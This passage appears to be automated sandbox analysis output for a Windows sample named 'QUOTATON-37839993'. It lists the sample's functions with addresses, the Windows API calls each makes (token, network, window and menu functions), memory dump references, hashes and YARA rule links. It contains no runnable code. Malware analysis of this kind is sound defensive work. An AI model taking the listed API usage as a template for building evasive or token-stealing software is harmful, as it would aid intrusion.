                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1946975507-0
                                                                      • Opcode ID: 246934f5a23a873884cde93d60767c138e70d7f2f15cdb98f029142594603d08
                                                                      • Instruction ID: 89fac97e045ff6df93cf5ffef38f323bf99dd20fe0decc8d7c64ef3c7604a3ea
                                                                      • Opcode Fuzzy Hash: 246934f5a23a873884cde93d60767c138e70d7f2f15cdb98f029142594603d08
                                                                      • Instruction Fuzzy Hash: AFE03932604244EEDB215FAAEC4D7D83F10EB05336F108366FB6D680F287714994DB12
                                                                      Function 00E58712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00E5871B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E582E6), ref: 00E58722
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E582E6), ref: 00E5872F
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E582E6), ref: 00E58736
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                                                                      • Instruction ID: 23770d62be30e99d04327e919ea86f44e3fe00c5d955fc806c0e3409a52a4d8c
                                                                      • Opcode Fuzzy Hash: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                                                                      • Instruction Fuzzy Hash: 62E086366113119FD7205FB25D0CB563BACEF54796F244828F649F9060DA348449C750
                                                                      Function 00E06240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %
                                                                      • API String ID: 0-2291192146
                                                                      • Opcode ID: c242ea5c4c85d74c77002265b9930c708188ff88f80a5cf7fcabc9d3df04565a
                                                                      • Instruction ID: 4068472129475b3c9a30ecb7224b92d79de83e3c31c21ef0da473e55732b28a3
                                                                      • Opcode Fuzzy Hash: c242ea5c4c85d74c77002265b9930c708188ff88f80a5cf7fcabc9d3df04565a
                                                                      • Instruction Fuzzy Hash: 59B18C7190010A9BCF24EF94C885AEEBBB9FF44314F146026E952B72D1DB349EE5CB91
                                                                      Function 00E7AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __itow_s
                                                                      • String ID: xb$xb
                                                                      • API String ID: 3653519197-3775679291
                                                                      • Opcode ID: 7c0ed40e2c3100a5735539e9540b077b678bbb0a4cbe21c844eb4371fb59b872
                                                                      • Instruction ID: d15403c0c5d7036c08d41da9a0d97d69acf38ecf433b001b3d18083f4a346d8e
                                                                      • Opcode Fuzzy Hash: 7c0ed40e2c3100a5735539e9540b077b678bbb0a4cbe21c844eb4371fb59b872
                                                                      • Instruction Fuzzy Hash: 62B15E70A00209EFCB14DF54C891EAABBF9FF58304F54D569F949AB292DB31E981CB50
                                                                      Function 00E6AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • __wcsnicmp.LIBCMT ref: 00E6B02D
                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E6B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                      • String ID: LPT
                                                                      • API String ID: 3222508074-1350329615
                                                                      • Opcode ID: cb1807c16c7c414070401aad31f797f0f1392052003b4e9e9434af2136ca6f1e
                                                                      • Instruction ID: 8990ac2fa5fa2906603f801b962b60d422634546d94adf333e516efe108822a0
                                                                      • Opcode Fuzzy Hash: cb1807c16c7c414070401aad31f797f0f1392052003b4e9e9434af2136ca6f1e
                                                                      • Instruction Fuzzy Hash: 32616F75A40215EFCB14DF94D891EAEB7F8EB09350F109069F916FB292D770AE84CB90
                                                                      Function 00E12957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00E12968
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E12981
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 5df55f678c6009f7dddc415b6a8432d09837e902c7d547dbbb96d135270bd23a
                                                                      • Instruction ID: 407501e88f3aefc784990880112b07e6bc1bd2f87c96205e9551c590382e8fc5
                                                                      • Opcode Fuzzy Hash: 5df55f678c6009f7dddc415b6a8432d09837e902c7d547dbbb96d135270bd23a
                                                                      • Instruction Fuzzy Hash: 235157B14087449BD320EF14DC86BAFBBE8FB85340F41885DF2D8611A6DB709569CB66
                                                                      Function 00E69734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E04F0B: __fread_nolock.LIBCMT ref: 00E04F29
                                                                      • _wcscmp.LIBCMT ref: 00E69824
                                                                      • _wcscmp.LIBCMT ref: 00E69837
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$__fread_nolock
                                                                      • String ID: FILE
                                                                      • API String ID: 4029003684-3121273764
                                                                      • Opcode ID: 3cc3a508ccd473c5a5aac2516307af48af5657d2e8ee71758264e7b9cf795703
                                                                      • Instruction ID: a0d10f19a8a61fd74b863140fa4785382d7f1b46b80ad2e648ea1e221b63838c
                                                                      • Opcode Fuzzy Hash: 3cc3a508ccd473c5a5aac2516307af48af5657d2e8ee71758264e7b9cf795703
                                                                      • Instruction Fuzzy Hash: D341F571A4020ABADF219AE4DC45FEFB7FDEF85714F001069FA04B71C1DA71A9048B60
                                                                      Function 00E40574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID: Dd$Dd
                                                                      • API String ID: 1473721057-2413357308
                                                                      • Opcode ID: a7440a28ebecd5f47c49b388a0947f152b7f4fcf8407d9c8a8e5e65f6524e476
                                                                      • Instruction ID: 98f4fe4484eeaada1015fd613020888344f9b5609f23f45f15bb24fc9dcd55a4
                                                                      • Opcode Fuzzy Hash: a7440a28ebecd5f47c49b388a0947f152b7f4fcf8407d9c8a8e5e65f6524e476
                                                                      • Instruction Fuzzy Hash: D65114B86053058FD754DF19C580A1ABBF1BB99344F58A82DE985AB3A1D332E881CB42
                                                                      Function 00E7258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E7259E
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E725D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_memset
                                                                      • String ID: |
                                                                      • API String ID: 1413715105-2343686810
                                                                      • Opcode ID: f0d6bacb707eceb0cea19495934bf240dfdb0aa476bc6aae1b1a5a39ad8e236c
                                                                      • Instruction ID: 4ae60f1ecb1cb680173edb11e42513063dff451418f13472d6e2eb7547bca492
                                                                      • Opcode Fuzzy Hash: f0d6bacb707eceb0cea19495934bf240dfdb0aa476bc6aae1b1a5a39ad8e236c
                                                                      • Instruction Fuzzy Hash: F1311871D00119ABCF11AFA0CC85EEEBFB8FF08350F14605AF958B6162DB315995DB60
                                                                      Function 00E87A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E87B61
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E87B76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: 1a46a5b7f08530d8a2e0b50c2abdcfc92cc5d23f434a998f89f5889858145548
                                                                      • Instruction ID: 9cd9d2c6ae5532dd16ffbf527b82943ec0101fef6a3edbe95d010fc855a63d13
                                                                      • Opcode Fuzzy Hash: 1a46a5b7f08530d8a2e0b50c2abdcfc92cc5d23f434a998f89f5889858145548
                                                                      • Instruction Fuzzy Hash: 3B412875A042099FDB14DF65C981BEABBF6FB08304F20116AED48AB391D771A981CF90
                                                                      Function 00E86A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00E86B17
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E86B53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: db36754a3de1474a1bfbb12096331d8f452f666e9fbe0a29cde26792dc642115
                                                                      • Instruction ID: 965c3404510346a29143eb16ed21cdc4f9d8554db2cc7181347142f1930a5d82
                                                                      • Opcode Fuzzy Hash: db36754a3de1474a1bfbb12096331d8f452f666e9fbe0a29cde26792dc642115
                                                                      • Instruction Fuzzy Hash: AF318F71100604AEDB10AF64CC41AFB73B9FF48764F10A619F9ADE7190DA31AC81C760
                                                                      Function 00E628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62911
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E6294C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: 8f5ec577a00f900b1882b14d7760bb867bddacc2beeb3a5ae58c20c3533a4833
                                                                      • Instruction ID: 84d9335f2207b4b24094c2b7e7977875b7d2e3272d32e39208de8c8e6a744124
                                                                      • Opcode Fuzzy Hash: 8f5ec577a00f900b1882b14d7760bb867bddacc2beeb3a5ae58c20c3533a4833
                                                                      • Instruction Fuzzy Hash: 0E31D131A407059FEB28CF58EC45BAEBBF4EFC5394F18202DEA85B61A1DB709944CB11
                                                                      Function 00E866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E86761
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E8676C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: ce3de19ea77b79a8ac2be89ccd0f8b16ae1af44d1e7b00ae4e35555627f0fcf4
                                                                      • Instruction ID: e5eb7ae44ae576d24ec90b8583fe406c7086f071343510c47c8ecd6194d4e3ef
                                                                      • Opcode Fuzzy Hash: ce3de19ea77b79a8ac2be89ccd0f8b16ae1af44d1e7b00ae4e35555627f0fcf4
                                                                      • Instruction Fuzzy Hash: 53118675200208AFEF11AF54DC81EEB376AEB44368F105126F91CB7290D6729C5197A0
                                                                      Function 00E86C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                                                                        • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                                                                        • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E86C71
                                                                      • GetSysColor.USER32(00000012), ref: 00E86C8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: b7e0a0f4d654e06562e058127508ca442940c83946b4a668a2afa6d1b077fb4d
                                                                      • Instruction ID: c1aa4562e6f000e87fc7f6ddba0a26369ea97d466838109d68e1cd283529ac94
                                                                      • Opcode Fuzzy Hash: b7e0a0f4d654e06562e058127508ca442940c83946b4a668a2afa6d1b077fb4d
                                                                      • Instruction Fuzzy Hash: 83212C72510209AFDF04DFA8CC45EEABBA8FB08315F005629F959E2250D635E851DB60
                                                                      Function 00E86920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00E869A2
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E869B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 5a5c27403915c8c2d55a99c9e863e98d001e438d3a2ef931bbc6aee4ba17e4c1
                                                                      • Instruction ID: f057fb8d220e99098db4de24ff7fc9b3b5079735c6d7bfde8308f63d2fb046f7
                                                                      • Opcode Fuzzy Hash: 5a5c27403915c8c2d55a99c9e863e98d001e438d3a2ef931bbc6aee4ba17e4c1
                                                                      • Instruction Fuzzy Hash: 86116D71500204AFEB10AF64DC45AEB37A9EB45378F606724F9ADB61E0C631DC959760
                                                                      Function 00E629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62A22
                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E62A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
                                                                      • Instruction ID: 2f72abc3556dd9a7284edf67c9bed07d02ff02745feb41f66704e749af4455d3
                                                                      • Opcode Fuzzy Hash: 00082fd1bc8465096d54c05152c8aecd9ae343292ca0a50e5b86dd55da7a2265
                                                                      • Instruction Fuzzy Hash: 0E11E932941514AFCB35DFE8EC44FEA73B8AB85388F046029EA55F7251D7B0AD0AC791
                                                                      Function 00E721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E7222C
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E72255
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
